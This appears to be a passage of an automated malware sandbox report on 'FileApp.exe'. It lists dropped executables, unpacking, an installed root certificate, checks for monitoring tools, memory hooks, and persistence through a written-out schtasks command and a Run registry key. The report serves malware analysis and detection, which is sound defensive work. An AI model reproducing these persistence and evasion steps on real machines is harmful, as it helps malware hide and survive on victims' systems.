Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: linkinfo.dll

Source: C:\Users\user\Desktop\FileApp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\FileApp.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: FileApp.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FileApp.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: FileApp.exe

Static file information: File size 9522176 > 1048576

Source: FileApp.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x8b2600

Source: FileApp.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: FileApp.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdbI source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: premium_gitrep.pdbx source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdbG source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.PDB source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdb source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: PE.pdb source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2130007558.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: adsbrowser.pdb(D source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: \??\C:\Windows\exe\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BotClient.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: adsbrowser.pdb source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\iofolko5\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: HP.o<C:\Windows\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2563660175.00000000012F9000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe

Unpacked PE file: 7.2.kPy9KuGWnhtidoY4IdmVbiaT.exe.c60000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tmvaidtc:EW;vymybyyn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tmvaidtc:EW;vymybyyn:EW;.taggant:EW;

Source: FileApp.exe

Static PE information: 0xE7847BAD [Sat Jan 31 05:48:29 2093 UTC]

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe

Code function: 14_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,

14_2_00406312

Source: C:\Users\user\Desktop\FileApp.exe	Code function: 0_2_05812921 pushfd ; retf	0_2_05812A05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00565A60 push ecx; ret	2_2_00565A73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0609C711 push es; ret	21_2_0609C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0609D413 push es; ret	21_2_0609D420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0609ECF2 push eax; ret	21_2_0609ED01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0041A9F5 push ecx; ret	22_2_0041AA08

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Jump to dropped file

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\627000\Legitimate.pif

Jump to dropped file

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lamp[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[2].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\627000\Legitimate.pif	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d60cd3ce002_SeparatelyDied[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d1b7f7f3765_Front[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	File created: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userEHJKFCGHID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d59ef9d4404_premium[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d7077a2064d_l[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d70e8640404_trics[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	File created: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	File created: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66c6fcb30b9dd_123p[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	File created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d707730e9bf_s[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userFBKKJEBFID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d58b1858bcb_crypted[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d72df86b9f3_crypted[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	File created: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	File created: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Window searched: window name: Regmonclass	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST

Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk

Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk

Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Memory written: PID: 5776 base: 7FFDB4590008 value: E9 EB D9 E9 FF			Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Memory written: PID: 5776 base: 7FFDB442D9F0 value: E9 20 26 16 00			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

22_2_004195E0

Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
